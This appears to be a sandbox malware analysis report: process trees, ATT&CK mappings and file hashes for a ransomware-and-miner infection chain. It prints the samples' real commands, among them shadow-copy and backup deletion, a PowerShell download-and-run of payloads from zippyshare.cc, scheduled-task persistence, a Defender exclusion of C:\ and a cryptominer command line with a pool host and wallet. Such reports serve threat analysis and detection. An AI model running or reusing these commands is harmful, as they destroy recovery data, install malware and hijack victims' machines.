PID 2676 wrote to memory of 196	2676	services.exe	89
PID 2676 wrote to memory of 196	2676	services.exe	89
PID 2676 wrote to memory of 196	2676	services.exe	89
PID 2676 wrote to memory of 2328	2676	services.exe	90
PID 2676 wrote to memory of 2328	2676	services.exe	90
PID 2676 wrote to memory of 2328	2676	services.exe	90
PID 2676 wrote to memory of 3804	2676	services.exe	96
PID 2676 wrote to memory of 3804	2676	services.exe	96
PID 2676 wrote to memory of 3804	2676	services.exe	96
PID 2676 wrote to memory of 200	2676	services.exe	95
PID 2676 wrote to memory of 200	2676	services.exe	95
PID 2676 wrote to memory of 200	2676	services.exe	95
PID 2676 wrote to memory of 2168	2676	services.exe	94
PID 2676 wrote to memory of 2168	2676	services.exe	94
PID 2676 wrote to memory of 2168	2676	services.exe	94
PID 2676 wrote to memory of 1056	2676	services.exe	97
PID 2676 wrote to memory of 1056	2676	services.exe	97
PID 2676 wrote to memory of 1056	2676	services.exe	97
PID 3992 wrote to memory of 856	3992	cmd.exe	100
PID 3992 wrote to memory of 856	3992	cmd.exe	100
PID 2168 wrote to memory of 3712	2168	cmd.exe	101
PID 2168 wrote to memory of 3712	2168	cmd.exe	101
PID 2168 wrote to memory of 3712	2168	cmd.exe	101
PID 196 wrote to memory of 3924	196	cmd.exe	102
PID 196 wrote to memory of 3924	196	cmd.exe	102
PID 196 wrote to memory of 3924	196	cmd.exe	102
PID 3020 wrote to memory of 472	3020		106
PID 3020 wrote to memory of 472	3020		106
PID 3020 wrote to memory of 472	3020		106
PID 856 wrote to memory of 1300	856	powershell.exe	107
PID 856 wrote to memory of 1300	856	powershell.exe	107
PID 3992 wrote to memory of 192	3992	cmd.exe	108
PID 3992 wrote to memory of 192	3992	cmd.exe	108
PID 3020 wrote to memory of 3544	3020		109
PID 3020 wrote to memory of 3544	3020		109
PID 3020 wrote to memory of 1424	3020		110
PID 3020 wrote to memory of 1424	3020		110
PID 3020 wrote to memory of 1424	3020		110
PID 3020 wrote to memory of 1424	3020		110

C:\Users\Admin\AppData\Local\Temp\27923d58a1326ee7f05aea88dfd0ef09.exe
"C:\Users\Admin\AppData\Local\Temp\27923d58a1326ee7f05aea88dfd0ef09.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:992
- C:\Users\Admin\AppData\Local\Temp\27923d58a1326ee7f05aea88dfd0ef09.exe
  "C:\Users\Admin\AppData\Local\Temp\27923d58a1326ee7f05aea88dfd0ef09.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:2296

C:\Users\Admin\AppData\Local\Temp\E4B8.exe
C:\Users\Admin\AppData\Local\Temp\E4B8.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3820
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe" -start
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Suspicious use of WriteProcessMemory
  PID:2676
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:196
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3924
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    3⤵
    PID:2328
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2168
  - - C:\Windows\SysWOW64\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:3712
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    PID:200
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:3804
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe" -agent 0
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:1056

C:\Users\Admin\AppData\Local\Temp\EF48.exe
C:\Users\Admin\AppData\Local\Temp\EF48.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:508

C:\Users\Admin\AppData\Local\Temp\F42B.exe
C:\Users\Admin\AppData\Local\Temp\F42B.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2220
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630257393/download', '%Temp%\\WindowsHost.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630257468/download', '%Temp%\\WindowsAPI.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630258463/download', '%Temp%\\svhost.exe') & powershell Start-Process -FilePath '%Temp%\\WindowsHost.exe' & powershell Start-Process -FilePath '%Temp%\\WindowsAPI.exe' & powershell Start-Process -FilePath '%Temp%\\svhost.exe' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630257393/download', 'C:\Users\Admin\AppData\Local\Temp\\WindowsHost.exe')
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of AdjustPrivilegeToken
    PID:1568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630257468/download', 'C:\Users\Admin\AppData\Local\Temp\\WindowsAPI.exe')
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of AdjustPrivilegeToken
    PID:3852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630258463/download', 'C:\Users\Admin\AppData\Local\Temp\\svhost.exe')
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of AdjustPrivilegeToken
    PID:2248
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\WindowsHost.exe'
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:856
  - - C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
      "C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"
      4⤵
      Executes dropped EXE
      PID:1300
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "SafeWindows" /tr '"C:\Users\Admin\AppData\Roaming\SafeWindows.exe"' & exit
        5⤵
        
        PID:4112
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "SafeWindows" /tr '"C:\Users\Admin\AppData\Roaming\SafeWindows.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:4168
    - - C:\Users\Admin\AppData\Roaming\SafeWindows.exe
        
        "C:\Users\Admin\AppData\Roaming\SafeWindows.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4156
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "SafeWindows" /tr '"C:\Users\Admin\AppData\Roaming\SafeWindows.exe"' & exit
        6⤵
        
        PID:4512
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "SafeWindows" /tr '"C:\Users\Admin\AppData\Roaming\SafeWindows.exe"'
        7⤵
        Creates scheduled task(s)
        
        PID:4940
      - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        6⤵
        Executes dropped EXE
        
        PID:4980
      - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=info.displaypluginwatchdog.xyz --user=43x1GMVXBpY6gd46aqN5VCTYWDmZjYk2zVYZVYb4zvBpCuAMcocaackDDL5wirHTQwbZoAGmLjB9H2wuBhKFVVdJLDmb8Fe --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth
        6⤵
        
        PID:5040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\WindowsAPI.exe'
    3⤵
    PID:192
  - - C:\Users\Admin\AppData\Local\Temp\WindowsAPI.exe
      "C:\Users\Admin\AppData\Local\Temp\WindowsAPI.exe"
      4⤵
      Executes dropped EXE
      PID:4272
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "DriverVideocard" /tr '"C:\Users\Admin\AppData\Roaming\DriverVideocard.exe"' & exit
        5⤵
        
        PID:2140
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "DriverVideocard" /tr '"C:\Users\Admin\AppData\Roaming\DriverVideocard.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:184
    - - C:\Users\Admin\AppData\Roaming\DriverVideocard.exe
        
        "C:\Users\Admin\AppData\Roaming\DriverVideocard.exe"
        5⤵
        Executes dropped EXE
        
        PID:4280
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "DriverVideocard" /tr '"C:\Users\Admin\AppData\Roaming\DriverVideocard.exe"' & exit
        6⤵
        
        PID:4764
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "DriverVideocard" /tr '"C:\Users\Admin\AppData\Roaming\DriverVideocard.exe"'
        7⤵
        Creates scheduled task(s)
        
        PID:4432
      - C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
        6⤵
        Executes dropped EXE
        
        PID:4748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\svhost.exe'
    3⤵
    PID:4404
  - - C:\Users\Admin\AppData\Local\Temp\svhost.exe
      "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:4720
    - - C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:4576
    - - C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:4424

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2376

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3472

C:\Users\Admin\AppData\Local\Temp\1C65.exe
C:\Users\Admin\AppData\Local\Temp\1C65.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:472
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C taskkill /F /PID 472 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1C65.exe"
  2⤵
  PID:4940
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /PID 472
    3⤵
    - Kills process with taskkill
    PID:4976
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:5008

C:\Users\Admin\AppData\Local\Temp\2242.exe
C:\Users\Admin\AppData\Local\Temp\2242.exe
1⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
PID:3544
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Wxqzckqsqcvglaedzdxnjkt.vbs"
  2⤵
  PID:4532
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Twitch\TwitchUpdate.exe'
    3⤵
    PID:4808
- C:\Users\Admin\AppData\Local\Temp\2242.exe
  C:\Users\Admin\AppData\Local\Temp\2242.exe
  2⤵
  - Executes dropped EXE
  PID:4648
- - C:\Users\Admin\AppData\Local\Temp\2242.exe
    "C:\Users\Admin\AppData\Local\Temp\2242.exe"
    3⤵
    - Executes dropped EXE
    PID:1300

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1424

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2248

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4216

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4372

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4540

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4652

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4732

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4828

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4896

C:\Users\Admin\AppData\Roaming\hdwsube
C:\Users\Admin\AppData\Roaming\hdwsube
1⤵
PID:1120

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

MD5
5703edef7cb0f99305a6b18845e0443e

SHA1
fb6f022ebde210306e1a6575462d6451e98af454

SHA256
e4ce02059eb175c30879041d610db7b8798cdf57a4c67afc83c125c2db36e883

SHA512
4631853bda1498ff3cace6a348fd2d6770edd0fec166707c3afebff09644f34e29a7a6dd3e9cb167c40e8b5fa1fbbc80ba26d80b4d939daf56278c276b07ada4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

MD5
888f7457c332ac5e1897316e159f58c1

SHA1
a3047c6e978158dfae29b5735e8131ec1b30703d

SHA256
c2c14652875bfeb1ed529202da6d45eb974acab193c005908cf90b8c5cf3dd41

SHA512
0abdc5f78ade2f56b0f1954adc0479b5dcc88d401bfac95754e7dd80adefe7375a426fd89f81b657ebe9c113092524dcbd1e80c39a4bec51ccd93bc0bc3a5aff

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5
939460925953ce88e1086341b8a11bda

SHA1
06249b891050a9fac128ccfee943aeb5bede1c7b

SHA256
d4da3c5ff04a3b677eb77b1bfedc14e29ebd0d01c476d44a0b1a2366447ab016

SHA512
a8dc3eb58a4a550cc2551463a3d813396caf3f2b65f5b13c8e339a4a32652895ee15c23eb5ba833eca4e7c22331a622657cf5bd64098f0c54e43b4e92fe65f30

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

MD5
1063b3928b32ce6675698c7c05be7a03

SHA1
99d6a671ac62304817ccb7dd7f75e71444c25151

SHA256
0c1605af0e04a61977706e1509a823064ecc4be3e296e44863fd79544ac142d3

SHA512
877d14af0b0e553f5be917b0506d22650559eeecc524febe4c4b07894535a498b28e57411d09afa2aaf7563b1c7df4911f38d1e7def0a73d779c4a169b490d62

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

MD5
8d96747256d7a22ef1d43109cdf451b0

SHA1
ad0acefd61e5ae23dc82c4d50a6558183ed3989b

SHA256
7c222fb0b74148ff4675680427ee370e8c390543de6dfc38e27215a4861c5a40

SHA512
f3670b0c963217bd0517aa20ef2d179320756135078d9425f1ac8541f9b794a553c7f8e62a39644b0b1eb9f2895f780cb48b1ffe83eec647bfef25f6501716a9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5
54380e465e50a43ae7d451fa75f0003a

SHA1
4f746354f2df43e7744a92a686264ed2c609d525

SHA256
e4a4ce957125df5a4f5b3c1d6cf2f9f39566ba7bf2a5e247cc483e29127a5137

SHA512
7c6ccb56b825d0a840ea3002e84546bfdd879da658261c6adbf31a18cfbacc81587ce109fe3b7719ba1a1df3e311d9e5f2e535dffdb4ef3aeadd36a1720c59d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\2242.exe.log

MD5
7a67bf079fc4538c83e05c4c8d8fabd7

SHA1
6fed3c6bcb8a0a132818108fd92a2d2b9e9db464

SHA256
f47660253cb61730ed0dd7161e85a4dcc598ea38c9a8ddcbed4c5dd779dfc112

SHA512
e13f5530eb7fde87fc70091e6e51af4f67cc863998059308ce28e693017fce9332fe5d3d90c29efee5fb0616f4f07915d071579c8b7a43c2467e37f5afbbdf24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svhost.exe.log

MD5
b4f7a6a57cb46d94b72410eb6a6d45a9

SHA1
69f3596ffa027202d391444b769ceea0ae14c5f7

SHA256
23994ebe221a48ea16ebad51ae0d4b47ccd415ae10581f9405e588d4f6c2523b

SHA512
be6da516e54c3a5b33ac2603137a2f8cf8445ff5961dd266faedf3627bae8979953d7ef305538df0151c609917a5b99bf5d023bdd32de50fd5c723950f90db5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DRMDU4BX\DCHW5S07.htm

MD5
b1cd7c031debba3a5c77b39b6791c1a7

SHA1
e5d91e14e9c685b06f00e550d9e189deb2075f76

SHA256
57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

SHA512
d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
3caab38b05ebf524dea254c6f8ac04b9

SHA1
d685d4af2487447217e40efa754b7628320ebf19

SHA256
cf8a236c8f297d7640e72aedc462cdbb7e5582715ec0cfa0e0978bbf0eefea54

SHA512
ecdc2f7a39d38b0a52fd584d6c0a2156a2d1313d195ef1bc10da18ae92182459113536a19d59175a1f1b8770f8ef846ff575cc753264836ee3b9dde5a3a75ff8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
ef2ac678283212748c645455dcffbb62

SHA1
227a8500e2fcf96a819e3c336f9af30e2c5320f9

SHA256
2b3624fe168167613245ef5031d14038d69dc08dfdec74dbaf83382ca83d2caf

SHA512
2da401c4912f84eac978f58c5b2e7da5f88a0d62e91de7c4e2ffeee8305a34ab93ffa2835cfecb4b1569d28deec71f4b6fa58b6aface359df421a77c66edd933

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
b43e6871c9caa7bc6b5ac17cc63c73e9

SHA1
28b4d886b7bf638be47226d02487b2c3a6ced878

SHA256
bc33b1ded3b327b907ab0245aa7980e3795b0ee18549f9b0db4f12825b5fc6f5

SHA512
8c280cf71f6cf905c660bf18f008526bb66da09773c02fe711ed352963c90d50024eeaabd8bcb6620c4db65065a4667f2954789653a255603812848d4a01fdd7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
56608a5862403ddf2fc5c87f91735021

SHA1
9b4a7f4d30bc3a79cf07535ab9ce3c0149b3a4a1

SHA256
c862499b4244e235436f5aa4d4662c303ad633f881abe1a34274843602594390

SHA512
c10ade83ec1440ca63091a8b27743aaa176f69a71c42a262aaa804e3a5d84fef7849b1946455a74994f5ab43c48342a33d32030b8444ea4535b5ae821297fcbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
1ea15cd551c6b7047cce80d1888ec8bb

SHA1
7a40ef6b6a110cd77a7dcea53a09c6fbcf03cab5

SHA256
725bc6e94e43e441ab3b3549c7c879c711dd5fc79c03bfed80e69ccd5e73a322

SHA512
3a6c2ced108ee527367982e68a3f3998226c84f7cbf553f4e8c3c20c2b07e2a23716531cc763449c139c7bf59eef861cc2f29e13b6bf11a4c254622e0ef6c04f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
54041cd9545bd205274affa5e372c5dd

SHA1
aae887b593f40f490b180bbb33936997fe98386e

SHA256
b61f9501431d2b163134571fdfe4a97b8414a26ace2c42897af5e76a4c417064

SHA512
938223fa693d1a5cbaa658985bfab763f1c663dfd9cd9e05c7e33d4af2564070612ebb1fe354f1a2ba55952c70e3e33b31a9fc2d0cc41ba461bf6c1c91d8f400

Download Submit
C:\Users\Admin\AppData\Local\Temp\1C65.exe

MD5
bdfe0c306b1ccbe9bd5eb7c8c0de7eae

SHA1
37457d8eeb31259beb354bc1aa70abf50e4a5944

SHA256
25e44e74e998ec59cf8d6fe24932d32a87e7c4601bd8bc45165be9ecae9f94f2

SHA512
45eab8e9ec765d66302c5e6a2bc4aedd1a36bff5ff72f5844e3f2bdf234b9104958005b17f2a8d2cbcaf213629154ccea2ea05ce81d28c10b8d14c09946f6f57

Download Submit
C:\Users\Admin\AppData\Local\Temp\1C65.exe

MD5
bdfe0c306b1ccbe9bd5eb7c8c0de7eae

SHA1
37457d8eeb31259beb354bc1aa70abf50e4a5944

SHA256
25e44e74e998ec59cf8d6fe24932d32a87e7c4601bd8bc45165be9ecae9f94f2

SHA512
45eab8e9ec765d66302c5e6a2bc4aedd1a36bff5ff72f5844e3f2bdf234b9104958005b17f2a8d2cbcaf213629154ccea2ea05ce81d28c10b8d14c09946f6f57

Download Submit
C:\Users\Admin\AppData\Local\Temp\2242.exe

MD5
edb8a8107c77a338d86e911b652e182a

SHA1
0529133671596df3eb68516620cf86649d6f1700

SHA256
a3b70262329151ab5e0b401d058e3ff202088204bfbcb1f54be8b5343e543063

SHA512
472eb32fd1e00c1df6c213f74d28b4db19975678c878c90b54ee336da8b6aabd9ddb405db59d36294adc36f6b6a0bd8571657c8b1ed4e689bddf183a7d1926fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\2242.exe

MD5
edb8a8107c77a338d86e911b652e182a

SHA1
0529133671596df3eb68516620cf86649d6f1700

SHA256
a3b70262329151ab5e0b401d058e3ff202088204bfbcb1f54be8b5343e543063

SHA512
472eb32fd1e00c1df6c213f74d28b4db19975678c878c90b54ee336da8b6aabd9ddb405db59d36294adc36f6b6a0bd8571657c8b1ed4e689bddf183a7d1926fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\2242.exe

MD5
edb8a8107c77a338d86e911b652e182a

SHA1
0529133671596df3eb68516620cf86649d6f1700

SHA256
a3b70262329151ab5e0b401d058e3ff202088204bfbcb1f54be8b5343e543063

SHA512
472eb32fd1e00c1df6c213f74d28b4db19975678c878c90b54ee336da8b6aabd9ddb405db59d36294adc36f6b6a0bd8571657c8b1ed4e689bddf183a7d1926fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\2242.exe

MD5
edb8a8107c77a338d86e911b652e182a

SHA1
0529133671596df3eb68516620cf86649d6f1700

SHA256
a3b70262329151ab5e0b401d058e3ff202088204bfbcb1f54be8b5343e543063

SHA512
472eb32fd1e00c1df6c213f74d28b4db19975678c878c90b54ee336da8b6aabd9ddb405db59d36294adc36f6b6a0bd8571657c8b1ed4e689bddf183a7d1926fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\E4B8.exe

MD5
e70ceaf1fc7771d3d791aedc0c2068a7

SHA1
97912679527c910bdf4c97265656f4c2527245db

SHA256
0e7b9aae7306cdb8cca2a7fa6552fd6cd03f3e2ab2e2d4ae51dfe325ff2016e5

SHA512
6a4c8a424e87f4a622aa20e4fd37060919cf686c32c0432eea026c12af372ffc6714c6baff46d0590a78fddf62ea7ca3eac3240846e1781d090d3867cfc2cd58

Download Submit
C:\Users\Admin\AppData\Local\Temp\E4B8.exe

MD5
e70ceaf1fc7771d3d791aedc0c2068a7

SHA1
97912679527c910bdf4c97265656f4c2527245db

SHA256
0e7b9aae7306cdb8cca2a7fa6552fd6cd03f3e2ab2e2d4ae51dfe325ff2016e5

SHA512
6a4c8a424e87f4a622aa20e4fd37060919cf686c32c0432eea026c12af372ffc6714c6baff46d0590a78fddf62ea7ca3eac3240846e1781d090d3867cfc2cd58

Download Submit
C:\Users\Admin\AppData\Local\Temp\EF48.exe

MD5
3242c783cee6fb3e589e6d3e9bad0281

SHA1
fdbf09b5a42d9a93a6515cf65630b033e0ec8dce

SHA256
71b23e033bd17225d74d832b3a4d243fb4bfc72b7f864248191443d9c1023026

SHA512
d3d06c35c737c190a2939869b126a494c6ec05b6608ffb59b15f09d93a61a23fb28176330c512650c0611bb4155ea1b098be3a157d5a85826635ed6602175994

Download Submit
C:\Users\Admin\AppData\Local\Temp\EF48.exe

MD5
3242c783cee6fb3e589e6d3e9bad0281

SHA1
fdbf09b5a42d9a93a6515cf65630b033e0ec8dce

SHA256
71b23e033bd17225d74d832b3a4d243fb4bfc72b7f864248191443d9c1023026

SHA512
d3d06c35c737c190a2939869b126a494c6ec05b6608ffb59b15f09d93a61a23fb28176330c512650c0611bb4155ea1b098be3a157d5a85826635ed6602175994

Download Submit
C:\Users\Admin\AppData\Local\Temp\F42B.exe

MD5
9ab35b644a731cfb70491c442487871b

SHA1
c348e1f570057cfb63bad701b0f8815ddf32a2b1

SHA256
536b07924f8cad1b08a0f65167c4ecd31b85ebb3f6d3d724d3d5c197de1a175d

SHA512
54380bf92e805c547f8f59bec37f1fe064fdd6c2d205b48721683049875cee78eecd150b514ac8d36e6a67a0ca0d1ec48c9b316c40b8fb8acc785f0f9ea500e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\F42B.exe

MD5
9ab35b644a731cfb70491c442487871b

SHA1
c348e1f570057cfb63bad701b0f8815ddf32a2b1

SHA256
536b07924f8cad1b08a0f65167c4ecd31b85ebb3f6d3d724d3d5c197de1a175d

SHA512
54380bf92e805c547f8f59bec37f1fe064fdd6c2d205b48721683049875cee78eecd150b514ac8d36e6a67a0ca0d1ec48c9b316c40b8fb8acc785f0f9ea500e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsAPI.exe

MD5
9dbebfb40aa9fdba9c94c13e9aaee095

SHA1
71cf110537941724ea0a417689ff5ed080202b13

SHA256
77d43b383b7683461991994eb77c860b021f52ff655f71c9bf7947abf1522e49

SHA512
f48879fee2c9c564b95c3fefc35e8bbfc42d59370ae6c7e535be809356c1347045c067fbe9f7559a98beaa9c971dd72b75df53bfcb6c9101edbe8f97470b4495

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsAPI.exe

MD5
